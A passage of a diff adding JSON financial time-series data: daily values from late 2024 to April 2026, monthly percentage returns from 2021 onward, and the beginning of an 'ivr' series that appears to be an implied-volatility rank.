+ 16951.294920714216 + ], + [ + "2024-12-17", + 16876.643369869136 + ], + [ + "2024-12-18", + 16267.7867628949 + ], + [ + "2024-12-19", + 16195.342358670434 + ], + [ + "2024-12-20", + 16336.766392617472 + ], + [ + "2024-12-23", + 16495.93286243663 + ], + [ + "2024-12-24", + 16719.61428611015 + ], + [ + "2024-12-26", + 16708.25300372502 + ], + [ + "2024-12-27", + 16486.15088162815 + ], + [ + "2024-12-30", + 16266.885688989207 + ], + [ + "2024-12-31", + 16128.704552205994 + ], + [ + "2025-01-02", + 16097.156307643296 + ], + [ + "2025-01-03", + 16360.58962400802 + ], + [ + "2025-01-06", + 16548.61758791623 + ], + [ + "2025-01-07", + 16253.32016667348 + ], + [ + "2025-01-08", + 16256.160002821427 + ], + [ + "2025-01-10", + 16001.247163797214 + ], + [ + "2025-01-13", + 15949.822003992242 + ], + [ + "2025-01-14", + 15934.678148996543 + ], + [ + "2025-01-15", + 16301.27764528654 + ], + [ + "2025-01-16", + 16187.069918878156 + ], + [ + "2025-01-17", + 16460.28134046467 + ], + [ + "2025-01-21", + 16556.82220494141 + ], + [ + "2025-01-22", + 16768.514501185833 + ], + [ + "2025-01-23", + 16804.164085364446 + ], + [ + "2025-01-24", + 16709.202522464355 + ], + [ + "2025-01-27", + 16222.721440850119 + ], + [ + "2025-01-28", + 16462.49042487863 + ], + [ + "2025-01-29", + 16431.57293204992 + ], + [ + "2025-01-30", + 16501.608659145833 + ], + [ + "2025-01-31", + 16477.632342080986 + ], + [ + "2025-02-03", + 16345.757753740958 + ], + [ + "2025-02-04", + 16546.410441295615 + ], + [ + "2025-02-05", + 16621.49605785011 + ], + [ + "2025-02-06", + 16708.25300372502 + ], + [ + "2025-02-07", + 16497.508288426587 + ], + [ + "2025-02-10", + 16697.211457241912 + ], + [ + "2025-02-11", + 16657.461502344053 + ], + [ + "2025-02-12", + 16667.243483152535 + ], + [ + "2025-02-13", + 16907.012467181048 + ], + [ + "2025-02-14", + 16977.997713016295 + ], + [ + "2025-02-18", + 17016.48616444618 + ], + [ + "2025-02-19", + 17021.222131382776 + ], + [ + "2025-02-20", + 16948.971506492868 + ], + [ + "2025-02-21", + 16597.20775605662 + ], + [ + "2025-02-24", + 16401.283284265177 + ], + [ + "2025-02-25", + 16194.639908582662 + ], + [ + "2025-02-26", + 16233.760080643207 + ], + [ + "2025-02-27", + 15782.928583207588 + ], + [ + "2025-02-28", + 16032.166594419272 + ], + [ + "2025-03-03", + 15681.340735962285 + ], + [ + "2025-03-04", + 15634.017884669904 + ], + [ + "2025-03-05", + 15837.823361997818 + ], + [ + "2025-03-06", + 15402.135719557897 + ], + [ + "2025-03-07", + 15515.394896123618 + ], + [ + "2025-03-10", + 14914.07436747034 + ], + [ + "2025-03-11", + 14878.424783291726 + ], + [ + "2025-03-12", + 15046.264816125697 + ], + [ + "2025-03-13", + 14775.57446368178 + ], + [ + "2025-03-14", + 15132.707839478626 + ], + [ + "2025-03-17", + 15230.82316104865 + ], + [ + "2025-03-18", + 14971.178230674532 + ], + [ + "2025-03-19", + 15171.513120120515 + ], + [ + "2025-03-20", + 15120.088929212216 + ], + [ + "2025-03-21", + 15169.934787440541 + ], + [ + "2025-03-24", + 15502.828306277539 + ], + [ + "2025-03-25", + 15591.297292573272 + ], + [ + "2025-03-26", + 15304.406018863643 + ], + [ + "2025-03-27", + 15217.202411622575 + ], + [ + "2025-03-28", + 14816.566544114155 + ], + [ + "2025-03-31", + 14815.93579238017 + ], + [ + "2025-04-01", + 14935.367809648234 + ], + [ + "2025-04-02", + 15044.372560923739 + ], + [ + "2025-04-03", + 14238.99464180762 + ], + [ + "2025-04-04", + 13354.62645254567 + ], + [ + "2025-04-07", + 13386.853893675992 + ], + [ + "2025-04-08", + 13145.776899139213 + ], + [ + "2025-04-09", + 14723.675513403814 + ], + [ + "2025-04-10", + 14097.443682396446 + ], + [ + "2025-04-11", + 14357.162248917693 + ], + [ + "2025-04-14", + 14454.477261835993 + ], + [ + "2025-04-15", + 14470.590982401154 + ], + [ + "2025-04-16", + 14034.253210293791 + ], + [ + "2025-04-17", + 14031.725358874482 + ], + [ + "2025-04-21", + 13684.486355900164 + ], + [ + "2025-04-22", + 14043.73192644369 + ], + [ + "2025-04-23", + 14362.216982859636 + ], + [ + "2025-04-24", + 14766.329251630023 + ], + [ + "2025-04-25", + 14930.942858543605 + ], + [ + "2025-04-28", + 14926.204953813665 + ], + [ + "2025-04-29", + 15024.783407993282 + ], + [ + "2025-04-30", + 15022.888246101305 + ], + [ + "2025-05-01", + 15219.097573514551 + ], + [ + "2025-05-02", + 15445.008428432157 + ], + [ + "2025-05-05", + 15353.379870086459 + ], + [ + "2025-05-06", + 15210.567407207312 + ], + [ + "2025-05-07", + 15270.282446944671 + ], + [ + "2025-05-08", + 15427.94809581768 + ], + [ + "2025-05-09", + 15417.835721243777 + ], + [ + "2025-05-12", + 16045.962714143121 + ], + [ + "2025-05-13", + 16290.51707883854 + ], + [ + "2025-05-14", + 16388.145045382153 + ], + [ + "2025-05-15", + 16406.152958942617 + ], + [ + "2025-05-16", + 16477.562581520542 + ], + [ + "2025-05-19", + 16493.359472873704 + ], + [ + "2025-05-20", + 16438.382337866286 + ], + [ + "2025-05-21", + 16209.942662632699 + ], + [ + "2025-05-22", + 16240.27687966439 + ], + [ + "2025-05-23", + 16089.878924733976 + ], + [ + "2025-05-27", + 16468.398756789302 + ], + [ + "2025-05-28", + 16395.409832634727 + ], + [ + "2025-05-29", + 16427.639211558395 + ], + [ + "2025-05-30", + 16401.730914528005 + ], + [ + "2025-06-02", + 16531.2743374733 + ], + [ + "2025-06-03", + 16660.501900103263 + ], + [ + "2025-06-04", + 16706.9469310101 + ], + [ + "2025-06-05", + 16581.19383184876 + ], + [ + "2025-06-06", + 16743.28249403305 + ], + [ + "2025-06-09", + 16767.929287595467 + ], + [ + "2025-06-10", + 16878.827262969604 + ], + [ + "2025-06-11", + 16821.95302827686 + ], + [ + "2025-06-12", + 16861.451070039795 + ], + [ + "2025-06-13", + 16649.760711588722 + ], + [ + "2025-06-16", + 16881.35802107893 + ], + [ + "2025-06-17", + 16716.742476372 + ], + [ + "2025-06-18", + 16713.897795740693 + ], + [ + "2025-06-20", + 16645.652589696096 + ], + [ + "2025-06-23", + 16816.810124737694 + ], + [ + "2025-06-24", + 17073.972741836125 + ], + [ + "2025-06-25", + 17117.62153694529 + ], + [ + "2025-06-26", + 17277.67745391007 + ], + [ + "2025-06-27", + 17336.828595783867 + ], + [ + "2025-06-30", + 17449.11984457347 + ], + [ + "2025-07-01", + 17302.03357847065 + ], + [ + "2025-07-02", + 17422.548822218894 + ], + [ + "2025-07-03", + 17593.98927508895 + ], + [ + "2025-07-07", + 17461.45777480477 + ], + [ + "2025-07-08", + 17471.263009133403 + ], + [ + "2025-07-09", + 17594.940731621627 + ], + [ + "2025-07-10", + 17569.635088321713 + ], + [ + "2025-07-11", + 17530.096352898523 + ], + [ + "2025-07-14", + 17593.677290360312 + ], + [ + "2025-07-15", + 17609.805544375566 + ], + [ + "2025-07-16", + 17627.83477366283 + ], + [ + "2025-07-17", + 17770.493181971004 + ], + [ + "2025-07-18", + 17753.41347142307 + ], + [ + "2025-07-21", + 17845.460593131414 + ], + [ + "2025-07-22", + 17753.09761110774 + ], + [ + "2025-07-23", + 17834.074119432793 + ], + [ + "2025-07-24", + 17872.029677692648 + ], + [ + "2025-07-25", + 17915.048689964497 + ], + [ + "2025-07-28", + 17971.03735309831 + ], + [ + "2025-07-29", + 17943.202889482414 + ], + [ + "2025-07-30", + 17967.24121593432 + ], + [ + "2025-07-31", + 17872.029677692648 + ], + [ + "2025-08-01", + 17519.975258254563 + ], + [ + "2025-08-04", + 17843.245695337417 + ], + [ + "2025-08-05", + 17722.098730958514 + ], + [ + "2025-08-06", + 17945.099989167735 + ], + [ + "2025-08-07", + 18005.83043261818 + ], + [ + "2025-08-08", + 18173.794484226266 + ], + [ + "2025-08-11", + 18120.02071888645 + ], + [ + "2025-08-12", + 18347.7637574123 + ], + [ + "2025-08-13", + 18356.93920890362 + ], + [ + "2025-08-14", + 18342.708054573686 + ], + [ + "2025-08-15", + 18262.04546877062 + ], + [ + "2025-08-18", + 18254.76905475797 + ], + [ + "2025-08-19", + 18007.09581167284 + ], + [ + "2025-08-20", + 17900.183877210562 + ], + [ + "2025-08-21", + 17817.31026920019 + ], + [ + "2025-08-22", + 18092.18431747721 + ], + [ + "2025-08-25", + 18039.993729300735 + ], + [ + "2025-08-26", + 18112.428444558474 + ], + [ + "2025-08-27", + 18140.26678376106 + ], + [ + "2025-08-28", + 18253.823411605328 + ], + [ + "2025-08-29", + 18042.52448741006 + ], + [ + "2025-09-02", + 17891.328161621266 + ], + [ + "2025-09-03", + 18032.085594657427 + ], + [ + "2025-09-04", + 18195.30399036219 + ], + [ + "2025-09-05", + 18221.557214608092 + ], + [ + "2025-09-08", + 18310.441857576454 + ], + [ + "2025-09-09", + 18362.318523230944 + ], + [ + "2025-09-10", + 18368.327620395587 + ], + [ + "2025-09-11", + 18475.239554857864 + ], + [ + "2025-09-12", + 18556.847783813573 + ], + [ + "2025-09-15", + 18715.63832172369 + ], + [ + "2025-09-16", + 18699.82399023042 + ], + [ + "2025-09-17", + 18662.49821480788 + ], + [ + "2025-09-18", + 18830.778126731297 + ], + [ + "2025-09-19", + 18958.25004859017 + ], + [ + "2025-09-22", + 19070.483163579407 + ], + [ + "2025-09-23", + 18943.81155037226 + ], + [ + "2025-09-24", + 18877.308420545338 + ], + [ + "2025-09-25", + 18795.92303782437 + ], + [ + "2025-09-26", + 18873.190609685982 + ], + [ + "2025-09-29", + 18960.594778538318 + ], + [ + "2025-09-30", + 19012.531515786523 + ], + [ + "2025-10-01", + 19103.733759596194 + ], + [ + "2025-10-02", + 19182.270586099163 + ], + [ + "2025-10-03", + 19101.518861802197 + ], + [ + "2025-10-06", + 19244.973703175405 + ], + [ + "2025-10-07", + 19143.636800168355 + ], + [ + "2025-10-08", + 19363.097709935202 + ], + [ + "2025-10-09", + 19339.66203721377 + ], + [ + "2025-10-10", + 18668.299968084542 + ], + [ + "2025-10-13", + 19064.466315241385 + ], + [ + "2025-10-14", + 18937.476903925563 + ], + [ + "2025-10-15", + 19071.114884210067 + ], + [ + "2025-10-16", + 19000.495881317132 + ], + [ + "2025-10-17", + 19125.268457045615 + ], + [ + "2025-10-20", + 19366.260188675187 + ], + [ + "2025-10-21", + 19361.19673466319 + ], + [ + "2025-10-22", + 19174.670560597802 + ], + [ + "2025-10-23", + 19335.86202446309 + ], + [ + "2025-10-24", + 19542.33584322787 + ], + [ + "2025-10-27", + 19890.369341473874 + ], + [ + "2025-10-28", + 20043.325183620454 + ], + [ + "2025-10-29", + 20133.579846484135 + ], + [ + "2025-10-30", + 19825.76524912562 + ], + [ + "2025-10-31", + 19921.40310190332 + ], + [ + "2025-11-03", + 20016.723156572345 + ], + [ + "2025-11-04", + 19610.424088011474 + ], + [ + "2025-11-05", + 19738.047157751298 + ], + [ + "2025-11-06", + 19370.37993732789 + ], + [ + "2025-11-07", + 19309.259997414985 + ], + [ + "2025-11-10", + 19736.462042794617 + ], + [ + "2025-11-11", + 19683.893584915753 + ], + [ + "2025-11-12", + 19668.375735804355 + ], + [ + "2025-11-13", + 19266.826198733495 + ], + [ + "2025-11-14", + 19281.392591312215 + ], + [ + "2025-11-17", + 19116.718912804918 + ], + [ + "2025-11-18", + 18883.958927307365 + ], + [ + "2025-11-19", + 18996.6978063598 + ], + [ + "2025-11-20", + 18547.011544791414 + ], + [ + "2025-11-21", + 18686.350513098612 + ], + [ + "2025-11-24", + 19164.220041085093 + ], + [ + "2025-11-25", + 19282.342110051548 + ], + [ + "2025-11-26", + 19452.716776581536 + ], + [ + "2025-11-28", + 19610.424088011474 + ], + [ + "2025-12-01", + 19544.55267881521 + ], + [ + "2025-12-02", + 19697.510458755136 + ], + [ + "2025-12-03", + 19745.64718325266 + ], + [ + "2025-12-04", + 19727.27884012992 + ], + [ + "2025-12-05", + 19807.714704111553 + ], + [ + "2025-12-08", + 19769.71457660475 + ], + [ + "2025-12-09", + 19794.09783027217 + ], + [ + "2025-12-10", + 19875.167352677807 + ], + [ + "2025-12-11", + 19810.882996231572 + ], + [ + "2025-12-12", + 19432.133535664794 + ], + [ + "2025-12-15", + 19334.59470761508 + ], + [ + "2025-12-16", + 19372.91263323056 + ], + [ + "2025-12-17", + 19013.796894841187 + ], + [ + "2025-12-18", + 19289.31041492225 + ], + [ + "2025-12-19", + 19540.75266606453 + ], + [ + "2025-12-22", + 19634.421720803122 + ], + [ + "2025-12-23", + 19726.37582843088 + ], + [ + "2025-12-24", + 19784.08718984891 + ], + [ + "2025-12-26", + 19782.817935207553 + ], + [ + "2025-12-29", + 19687.05800144908 + ], + [ + "2025-12-30", + 19641.39583905386 + ], + [ + "2025-12-31", + 19479.04751256126 + ], + [ + "2026-01-02", + 19441.314800536147 + ], + [ + "2026-01-05", + 19595.735614451984 + ], + [ + "2026-01-06", + 19767.91436658671 + ], + [ + "2026-01-07", + 19786.941559446946 + ], + [ + "2026-01-08", + 19674.373206208922 + ], + [ + "2026-01-09", + 19870.334496073934 + ], + [ + "2026-01-12", + 19886.823179651463 + ], + [ + "2026-01-13", + 19857.333840518444 + ], + [ + "2026-01-14", + 19645.201665184577 + ], + [ + "2026-01-15", + 19715.913682158098 + ], + [ + "2026-01-16", + 19699.424998580565 + ], + [ + "2026-01-20", + 19280.867449315563 + ], + [ + "2026-01-21", + 19541.51421884934 + ], + [ + "2026-01-22", + 19683.56997342704 + ], + [ + "2026-01-23", + 19745.718881606444 + ], + [ + "2026-01-26", + 19832.60178404882 + ], + [ + "2026-01-27", + 20012.39025065163 + ], + [ + "2026-01-28", + 20078.660845277085 + ], + [ + "2026-01-29", + 19958.484715364317 + ], + [ + "2026-01-30", + 19718.76611396279 + ], + [ + "2026-02-02", + 19854.16361060508 + ], + [ + "2026-02-03", + 19549.12393331743 + ], + [ + "2026-02-04", + 19207.620798646025 + ], + [ + "2026-02-05", + 18931.120941752062 + ], + [ + "2026-02-06", + 19331.284956580832 + ], + [ + "2026-02-09", + 19479.365310669935 + ], + [ + "2026-02-10", + 19388.994380205517 + ], + [ + "2026-02-11", + 19440.997002427473 + ], + [ + "2026-02-12", + 19045.588332468753 + ], + [ + "2026-02-13", + 19086.175414091904 + ], + [ + "2026-02-17", + 19066.51456280766 + ], + [ + "2026-02-18", + 19208.888115494035 + ], + [ + "2026-02-19", + 19135.323666715823 + ], + [ + "2026-02-20", + 19304.64998704585 + ], + [ + "2026-02-23", + 19070.002590829703 + ], + [ + "2026-02-24", + 19274.842849804158 + ], + [ + "2026-02-25", + 19554.197076296157 + ], + [ + "2026-02-26", + 19318.284301025345 + ], + [ + "2026-02-27", + 19256.451253161267 + ], + [ + "2026-03-02", + 19281.818905848242 + ], + [ + "2026-03-03", + 19075.39546971045 + ], + [ + "2026-03-04", + 19366.165236801255 + ], + [ + "2026-03-05", + 19307.818279165873 + ], + [ + "2026-03-06", + 19017.366310183745 + ], + [ + "2026-03-09", + 19271.354821782115 + ], + [ + "2026-03-10", + 19271.67261989079 + ], + [ + "2026-03-11", + 19269.136048401426 + ], + [ + "2026-03-12", + 18938.41285811148 + ], + [ + "2026-03-13", + 18826.162302982128 + ], + [ + "2026-03-16", + 19037.343021783316 + ], + [ + "2026-03-17", + 19130.250523737097 + ], + [ + "2026-03-18", + 18863.581092485256 + ], + [ + "2026-03-19", + 18803.966818001867 + ], + [ + "2026-03-20", + 18456.437146025713 + ], + [ + "2026-03-23", + 18668.298030291196 + ], + [ + "2026-03-24", + 18540.66720937799 + ], + [ + "2026-03-25", + 18662.583477715085 + ], + [ + "2026-03-26", + 18217.146796953555 + ], + [ + "2026-03-27", + 17861.243919931156 + ], + [ + "2026-03-30", + 17724.724440941776 + ], + [ + "2026-03-31", + 18324.7757149537 + ], + [ + "2026-04-01", + 18551.144857997533 + ], + [ + "2026-04-02", + 18572.416015551953 + ], + [ + "2026-04-06", + 18684.17243337818 + ], + [ + "2026-04-07", + 18687.03067856291 + ], + [ + "2026-04-08", + 19242.63478660729 + ], + [ + "2026-04-09", + 19372.804116803207 + ], + [ + "2026-04-10", + 19400.743221259763 + ], + [ + "2026-04-13", + 19601.395908814422 + ], + [ + "2026-04-14", + 19957.298785836825 + ], + [ + "2026-04-15", + 20236.68983040239 + ], + [ + "2026-04-16", + 20334.156960098317 + ], + [ + "2026-04-17", + 20600.212110859607 + ], + [ + "2026-04-20", + 20534.809647652975 + ], + [ + "2026-04-21", + 20456.708824652764 + ], + [ + "2026-04-22", + 20798.959947555562 + ], + [ + "2026-04-23", + 20681.8067752619 + ] + ], + "monthly_pct": [ + [ + "2021-05-31", + 0.706645248526927 + ], + [ + "2021-06-30", + 0.6197277330461715 + ], + [ + "2021-07-31", + 0.24662697723030202 + ], + [ + "2021-08-31", + 0.25838627887411203 + ], + [ + "2021-09-30", + -1.0460284895277616 + ], + [ + "2021-10-31", + 0.699921389279945 + ], + [ + "2021-11-30", + -0.1313801479228105 + ], + [ + "2021-12-31", + 1.802604073466374 + ], + [ + "2022-01-31", + -6.417407277996645 + ], + [ + "2022-02-28", + 1.5644610451498453 + ], + [ + "2022-03-31", + -0.051762517704412314 + ], + [ + "2022-04-30", + -5.541356011584653 + ], + [ + "2022-05-31", + 0.49702147708761135 + ], + [ + "2022-06-30", + 0.7947114854790938 + ], + [ + "2022-07-31", + 2.5354622898340784 + ], + [ + "2022-08-31", + -1.5250935147411604 + ], + [ + "2022-09-30", + 0.9700538733065089 + ], + [ + "2022-10-31", + 0.9714181656709897 + ], + [ + "2022-11-30", + 0.7954860183527979 + ], + [ + "2022-12-31", + -0.7018033780932686 + ], + [ + "2023-01-31", + 0.74285069051645 + ], + [ + "2023-02-28", + -0.2328994745275259 + ], + [ + "2023-03-31", + 0.7179894299630396 + ], + [ + "2023-04-30", + 0.22311251152480338 + ], + [ + "2023-05-31", + 0.25838627887411203 + ], + [ + "2023-06-30", + 0.24662697723027982 + ], + [ + "2023-07-31", + 0.2348690548344745 + ], + [ + "2023-08-31", + 0.2701469599276418 + ], + [ + "2023-09-30", + 0.2348690548344523 + ], + [ + "2023-10-31", + 0.3204866322285671 + ], + [ + "2023-11-30", + 0.5277193203648833 + ], + [ + "2023-12-31", + 0.2348690548344301 + ], + [ + "2024-01-31", + 0.3475093730222589 + ], + [ + "2024-02-29", + 0.7023132361777096 + ], + [ + "2024-03-31", + 0.822830405315278 + ], + [ + "2024-04-30", + 0.675919244492218 + ], + [ + "2024-05-31", + 0.7996706438484935 + ], + [ + "2024-06-30", + 0.3371104660279567 + ], + [ + "2024-07-31", + 0.9111457058388561 + ], + [ + "2024-08-31", + 3.462369623441486 + ], + [ + "2024-09-30", + 1.341016366510872 + ], + [ + "2024-10-31", + 0.6782299455278196 + ], + [ + "2024-11-30", + 0.7862496290612642 + ], + [ + "2024-12-31", + -0.6199515413415346 + ], + [ + "2025-01-31", + 3.067594178093569 + ], + [ + "2025-02-28", + -0.07921263020403968 + ], + [ + "2025-03-31", + -4.049658830140867 + ], + [ + "2025-04-30", + -1.369849329822459 + ], + [ + "2025-05-31", + 2.5221604596587843 + ], + [ + "2025-06-30", + 0.48907531953661376 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.24662697723027982 + ], + [ + "2025-09-30", + 0.24662697723025762 + ], + [ + "2025-10-31", + 1.148504310322429 + ], + [ + "2025-11-30", + 2.10834193830276 + ], + [ + "2025-12-31", + 1.4402379266319043 + ], + [ + "2026-01-31", + 0.2348690548344523 + ], + [ + "2026-02-28", + 1.0565244935238471 + ], + [ + "2026-03-31", + 1.125617429584569 + ], + [ + "2026-04-30", + 1.1452662354961118 + ] + ], + "ivr": [ + [ + "2021-04-01", + 50.0 + ], + [ + "2021-04-05", + 50.0 + ], + [ + "2021-04-06", + 50.0 + ], + [ + "2021-04-07", + 50.0 + ], + [ + "2021-04-08", + 50.0 + ], + [ + "2021-04-09", + 50.0 + ], + [ + "2021-04-12", + 50.0 + ], + [ + "2021-04-13", + 50.0 + ], + [ + "2021-04-14", + 50.0 + ], + [ + "2021-04-15", + 50.0 + ], + [ + "2021-04-16", + 50.0 + ], + [ + "2021-04-19", + 50.0 + ], + [ + "2021-04-20", + 50.0 + ], + [ + "2021-04-21", + 50.0 + ], + [ + "2021-04-22", + 50.0 + ], + [ + "2021-04-23", + 50.0 + ], + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 50.0 + ], + [ + "2021-04-28", + 50.0 + ], + [ + "2021-04-29", + 50.0 + ], + [ + "2021-04-30", + 50.0 + ], + [ + "2021-05-03", + 0.0 + ], + [ + "2021-05-04", + 100.0 + ], + [ + "2021-05-05", + 100.0 + ], + [ + "2021-05-06", + 83.03019088941541 + ], + [ + "2021-05-07", + 92.46826896652158 + ], + [ + "2021-05-10", + 100.0 + ], + [ + "2021-05-11", + 81.60129556125598 + ], + [ + "2021-05-12", + 100.0 + ], + [ + "2021-05-13", + 83.1588340060907 + ], + [ + "2021-05-14", + 100.0 + ], + [ + "2021-05-17", + 98.0063458630961 + ], + [ + "2021-05-18", + 97.83777447955939 + ], + [ + "2021-05-19", + 91.98390253525857 + ], + [ + "2021-05-20", + 100.0 + ], + [ + "2021-05-21", + 91.1818018813409 + ], + [ + "2021-05-24", + 100.0 + ], + [ + "2021-05-25", + 99.88530013528766 + ], + [ + "2021-05-26", + 100.0 + ], + [ + "2021-05-27", + 99.60517024846243 + ], + [ + "2021-05-28", + 98.99426678960053 + ], + [ + "2021-06-01", + 98.21413241948663 + ], + [ + "2021-06-02", + 83.65121516085425 + ], + [ + "2021-06-03", + 88.45040740960263 + ], + [ + "2021-06-04", + 99.29396751750357 + ], + [ + "2021-06-07", + 96.8699781246447 + ], + [ + "2021-06-08", + 63.19725340956908 + ], + [ + "2021-06-09", + 62.68361170220877 + ], + [ + "2021-06-10", + 20.418638794046302 + ], + [ + "2021-06-11", + 19.63912736891603 + ], + [ + "2021-06-14", + 0.0 + ], + [ + "2021-06-15", + 0.665984084588787 + ], + [ + "2021-06-16", + 0.0 + ], + [ + "2021-06-17", + 5.677904963144019 + ], + [ + "2021-06-18", + 0.0 + ], + [ + "2021-06-21", + 0.0 + ], + [ + "2021-06-22", + 0.0 + ], + [ + "2021-06-23", + 0.15692467134740387 + ], + [ + "2021-06-24", + 1.045135741820762 + ], + [ + "2021-06-25", + 0.0 + ], + [ + "2021-06-28", + 5.278503452579093 + ], + [ + "2021-06-29", + 2.7401279926647133 + ], + [ + "2021-06-30", + 3.9921722625588867 + ], + [ + "2021-07-01", + 0.0 + ], + [ + "2021-07-02", + 0.0 + ], + [ + "2021-07-06", + 0.06095470659091914 + ], + [ + "2021-07-07", + 0.0 + ], + [ + "2021-07-08", + 4.739859932452854 + ], + [ + "2021-07-09", + 1.980244669484471 + ], + [ + "2021-07-12", + 2.0551217043091135 + ], + [ + "2021-07-13", + 0.0 + ], + [ + "2021-07-14", + 0.0 + ], + [ + "2021-07-15", + 3.485999613730507 + ], + [ + "2021-07-16", + 3.952448527572875 + ], + [ + "2021-07-19", + 3.9946362427904156 + ], + [ + "2021-07-20", + 7.958830951201584 + ], + [ + "2021-07-21", + 6.635982250368182 + ], + [ + "2021-07-22", + 7.93415305997673 + ], + [ + "2021-07-23", + 11.522579694337107 + ], + [ + "2021-07-26", + 10.846036638984371 + ], + [ + "2021-07-27", + 15.001406444207301 + ], + [ + "2021-07-28", + 14.974812516830887 + ], + [ + "2021-07-29", + 14.46157228496693 + ], + [ + "2021-07-30", + 16.69910090432632 + ], + [ + "2021-08-02", + 10.955898344580062 + ], + [ + "2021-08-03", + 11.61079560148543 + ], + [ + "2021-08-04", + 11.555934784142318 + ], + [ + "2021-08-05", + 10.263455963600206 + ], + [ + "2021-08-06", + 10.926502516275834 + ], + [ + "2021-08-09", + 10.351686681736707 + ], + [ + "2021-08-10", + 12.184700436023583 + ], + [ + "2021-08-11", + 12.398097289217699 + ], + [ + "2021-08-12", + 9.514883391909947 + ], + [ + "2021-08-13", + 4.414104072086804 + ], + [ + "2021-08-16", + 0.0 + ], + [ + "2021-08-17", + 0.8995728832051325 + ], + [ + "2021-08-18", + 4.382283413829925 + ], + [ + "2021-08-19", + 2.724147498730146 + ], + [ + "2021-08-20", + 1.6620374453031574 + ], + [ + "2021-08-23", + 14.265454833917069 + ], + [ + "2021-08-24", + 6.378478477186166 + ], + [ + "2021-08-25", + 6.07703692329414 + ], + [ + "2021-08-26", + 8.703151904955092 + ], + [ + "2021-08-27", + 10.769626427671742 + ], + [ + "2021-08-30", + 15.36345060558558 + ], + [ + "2021-08-31", + 14.991135025163846 + ], + [ + "2021-09-01", + 14.990604347475681 + ], + [ + "2021-09-02", + 14.02309063387798 + ], + [ + "2021-09-03", + 12.126251248271675 + ], + [ + "2021-09-07", + 12.136715146605235 + ], + [ + "2021-09-08", + 11.05743967142535 + ], + [ + "2021-09-09", + 11.969001017420378 + ], + [ + "2021-09-10", + 16.265376952127575 + ], + [ + "2021-09-13", + 16.189540330548972 + ], + [ + "2021-09-14", + 16.96775785300457 + ], + [ + "2021-09-15", + 13.52346933409542 + ], + [ + "2021-09-16", + 5.716719209916317 + ], + [ + "2021-09-17", + 15.805363156520153 + ], + [ + "2021-09-20", + 33.30666518466819 + ], + [ + "2021-09-21", + 21.81996376384881 + ], + [ + "2021-09-22", + 26.541072562420904 + ], + [ + "2021-09-23", + 30.967479488198652 + ], + [ + "2021-09-24", + 29.488220511942032 + ], + [ + "2021-09-27", + 27.579417494561614 + ], + [ + "2021-09-28", + 50.37216690287134 + ], + [ + "2021-09-29", + 50.259065759095954 + ], + [ + "2021-09-30", + 49.4130201537232 + ], + [ + "2021-10-01", + 52.34207634215711 + ], + [ + "2021-10-04", + 62.11982977220924 + ], + [ + "2021-10-05", + 70.7689207779462 + ], + [ + "2021-10-06", + 73.89907194480043 + ], + [ + "2021-10-07", + 78.22777192828198 + ], + [ + "2021-10-08", + 77.56804443722808 + ], + [ + "2021-10-11", + 78.3919790820862 + ], + [ + "2021-10-12", + 78.41838723658334 + ], + [ + "2021-10-13", + 78.69324963037162 + ], + [ + "2021-10-14", + 91.42939871307092 + ], + [ + "2021-10-15", + 89.49232725888677 + ], + [ + "2021-10-18", + 79.02586895477437 + ], + [ + "2021-10-19", + 80.25615285542989 + ], + [ + "2021-10-20", + 77.91773475425045 + ], + [ + "2021-10-21", + 76.41404827980291 + ], + [ + "2021-10-22", + 78.9457389333772 + ], + [ + "2021-10-25", + 79.42476299464909 + ], + [ + "2021-10-26", + 47.82674586973051 + ], + [ + "2021-10-27", + 46.84575591538647 + ], + [ + "2021-10-28", + 47.342668208679626 + ], + [ + "2021-10-29", + 47.156710996014375 + ], + [ + "2021-11-01", + 19.3314686032918 + ], + [ + "2021-11-02", + 15.57726504524698 + ], + [ + "2021-11-03", + 17.411954737413108 + ], + [ + "2021-11-04", + 19.656369716436068 + ], + [ + "2021-11-05", + 15.044397997023772 + ], + [ + "2021-11-08", + 8.49677651222673 + ], + [ + "2021-11-09", + 12.644716637072225 + ], + [ + "2021-11-10", + 30.90007367541256 + ], + [ + "2021-11-11", + 20.023204235700884 + ], + [ + "2021-11-12", + 22.34515142638907 + ], + [ + "2021-11-15", + 20.459518902848252 + ], + [ + "2021-11-16", + 20.270285506393947 + ], + [ + "2021-11-17", + 19.781557728314112 + ], + [ + "2021-11-18", + 21.992537156879102 + ], + [ + "2021-11-19", + 14.637253716081608 + ], + [ + "2021-11-22", + 23.941130270471493 + ], + [ + "2021-11-23", + 26.451842915858535 + ], + [ + "2021-11-24", + 26.471912831880672 + ], + [ + "2021-11-26", + 41.01680543310346 + ], + [ + "2021-11-29", + 55.691880342488055 + ], + [ + "2021-11-30", + 64.58671141569263 + ], + [ + "2021-12-01", + 74.52513311694781 + ], + [ + "2021-12-02", + 71.97479622069484 + ], + [ + "2021-12-03", + 73.93930738797934 + ], + [ + "2021-12-06", + 76.67422808227123 + ], + [ + "2021-12-07", + 100.0 + ], + [ + "2021-12-08", + 99.1419237412602 + ], + [ + "2021-12-09", + 98.96972313294776 + ], + [ + "2021-12-10", + 100.0 + ], + [ + "2021-12-13", + 100.0 + ], + [ + "2021-12-14", + 100.0 + ], + [ + "2021-12-15", + 100.0 + ], + [ + "2021-12-16", + 100.0 + ], + [ + "2021-12-17", + 97.79064444276227 + ], + [ + "2021-12-20", + 97.63428903492166 + ], + [ + "2021-12-21", + 100.0 + ], + [ + "2021-12-22", + 100.0 + ], + [ + "2021-12-23", + 100.0 + ], + [ + "2021-12-27", + 97.97795788732172 + ], + [ + "2021-12-28", + 92.47968178625965 + ], + [ + "2021-12-29", + 88.96180572991312 + ], + [ + "2021-12-30", + 83.75717298193194 + ], + [ + "2021-12-31", + 84.34341669900378 + ], + [ + "2022-01-03", + 79.61633668539857 + ], + [ + "2022-01-04", + 82.77085680959645 + ], + [ + "2022-01-05", + 83.22750729177413 + ], + [ + "2022-01-06", + 82.56804402758237 + ], + [ + "2022-01-07", + 81.30490803269637 + ], + [ + "2022-01-10", + 78.94210510137101 + ], + [ + "2022-01-11", + 80.50313238424096 + ], + [ + "2022-01-12", + 79.24873536725532 + ], + [ + "2022-01-13", + 79.08426348670818 + ], + [ + "2022-01-14", + 69.80307220001721 + ], + [ + "2022-01-18", + 78.68901615742969 + ], + [ + "2022-01-19", + 79.1872704242228 + ], + [ + "2022-01-20", + 70.0065299613694 + ], + [ + "2022-01-21", + 75.0117234143464 + ], + [ + "2022-01-24", + 73.69618976151136 + ], + [ + "2022-01-25", + 70.15001783764347 + ], + [ + "2022-01-26", + 